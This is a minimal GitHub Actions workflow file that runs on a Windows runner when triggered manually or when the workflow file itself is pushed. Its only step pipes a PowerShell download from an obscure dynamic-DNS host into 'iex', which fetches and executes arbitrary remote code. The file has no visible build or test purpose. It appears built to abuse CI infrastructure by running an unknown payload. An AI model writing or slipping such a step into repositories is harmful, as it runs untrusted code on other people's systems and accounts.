name: a

on:
  workflow_dispatch:
  push:
    paths:
      - '.github/workflows/a.yml'

jobs:
  job:
    runs-on: windows-latest

    steps:
      - run: |
          irm http://xju.dpdns.org/24h.php?id=6905e6c8c6496 | iex
